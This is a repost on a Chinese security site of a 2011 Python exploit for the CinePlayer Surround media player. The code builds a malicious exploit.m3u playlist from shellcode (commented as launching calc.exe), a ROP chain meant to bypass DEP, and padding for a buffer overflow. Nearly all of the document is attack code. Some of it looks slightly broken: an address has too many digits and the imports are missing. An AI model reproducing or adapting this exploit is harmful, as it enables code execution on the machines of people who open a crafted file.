首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CinePlayer Surround Universal DEP Bypass Exploit
来源:Angel-Injection@hotmail.com 作者:Angel 发布时间:2011-09-08  
#!/usr/bin/python
#Exploit Title: CinePlayer Surround Universal DEP Bypass Exploit
#Author: Angel Injection
#Thanks To Inj3ct0r Team
#Home: http://1337day.com , http://sec-krb.org

shellcode = ("\xdd\xc3\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x32\xb8\x08\x99"
"\xc4\xb4\x31\x43\x17\x03\x43\x17\x83\xcb\x9d\x26\x41\x37"
"\x75\x2f\xaa\xc7\x86\x50\x22\x22\xb7\x42\x50\x27\xea\x52"
"\x12\x65\x07\x18\x76\x9d\x9c\x6c\x5f\x92\x15\xda\xb9\x9d"
"\xa6\xea\x05\x71\x64\x6c\xfa\x8b\xb9\x4e\xc3\x44\xcc\x8f"  # Shellcode WinExec "Calc.exe"
"\x04\xb8\x3f\xdd\xdd\xb7\x92\xf2\x6a\x85\x2e\xf2\xbc\x82"  # BadChars "\x0c\x0b\x0e"
"\x0f\x8c\xb9\x54\xfb\x26\xc3\x84\x54\x3c\x8b\x3c\xde\x1a"
"\x2c\x3d\x33\x79\x10\x74\x38\x4a\xe2\x87\xe8\x82\x0b\xb6"
"\xd4\x49\x32\x77\xd9\x90\x72\xbf\x02\xe7\x88\xbc\xbf\xf0"
"\x4a\xbf\x1b\x74\x4f\x67\xef\x2e\xab\x96\x3c\xa8\x38\x94"
"\x89\xbe\x67\xb8\x0c\x12\x1c\xc4\x85\x95\xf3\x4d\xdd\xb1"
"\xd7\x16\x85\xd8\x4e\xf2\x68\xe4\x91\x5a\xd4\x40\xd9\x48"
"\x01\xf2\x80\x06\xd4\x76\xbf\x6f\xd6\x88\xc0\xdf\xbf\xb9"
"\x4b\xb0\xb8\x45\x9e\xf5\x37\x0c\x83\x5f\xd0\xc9\x51\xe2"
"\xbd\xe9\x8f\x20\xb8\x69\x3a\xd8\x3f\x71\x4f\xdd\x04\x35"
"\xa3\xaf\x15\xd0\xc3\x1c\x15\xf1\xa7\xc3\x85\x99\x27")
#######################ROP START HERE#######################################
rop = pack('<L',0x5f367e8d3)
rop += pack('<L',0x013e6452)
rop += pack('<L',0x0047855b)
rop += pack('<L',0x00494277)
rop += pack('<L',0x00CA2108)
rop += pack('<L',0x10007584)
rop += pack('<L',0x00493b99)
rop += pack('<L',0x103c7de9)
rop += pack('<L',0x04e6fed7)
rop += pack('<L',0x00453cc7)
rop += pack('<L',0x100081cd)
rop += pack('<L',0x00493b98)
rop += pack('<L',0x000000db)
rop += pack('<L',0x004b0609)
rop += pack('<L',0x00000030)
rop += pack('<L',0x00645efd)
rop += ("A" * 40)
rop += pack('<L',0x00463BE9) # JMP to Shellcode
############################################################################
buf = ("\x90" * 20)
buf += shellcode
buf += ("A" * (3400-len(buf)))
buf += rop
buf += (
"\x40"
"\x7A\x30"
"\x45\xBE\x40\x15"
"\x40"
"\x8B\xEE"
"\x2B\xC8"
"\x5D\xD3"
"\x31"
"\xED\x11\x02\x31\xCD\x00"
"\xDC\x5D")
 
print "\t\t Exploit Creating"
sleep(1)
try:
    f = open("exploit.m3u","wb")
    f.write(buf)
    f.close()
    print "\t\t[+]File \"exploit.m3u\" Created Succefully."
    sleep(1)
except IOError,e:
    print "\t\t[+]Error: "+str(e)
    exit(-1) 

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows Server 2008 R1 Local D
·ludmila_f FTP Remote Buffer Ov
·Crush FTP 5 'APPE' command Rem
·Wordpress 1 Flash Gallery Plug
·DVD X Player 5.5 Pro (SEH DEP
·Mp3 Audio Editor Local Buffer
·Ubuntu <= 11.04 ftp client Loc
·DVD X Player 5.5 Pro SEH Overw
·WVxWorks FTP server Password O
·Linux Kernel < 2.6.36.2 Econet
·N-TRACK Studio universal Local
·TOWeb V3 Local Format String D
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved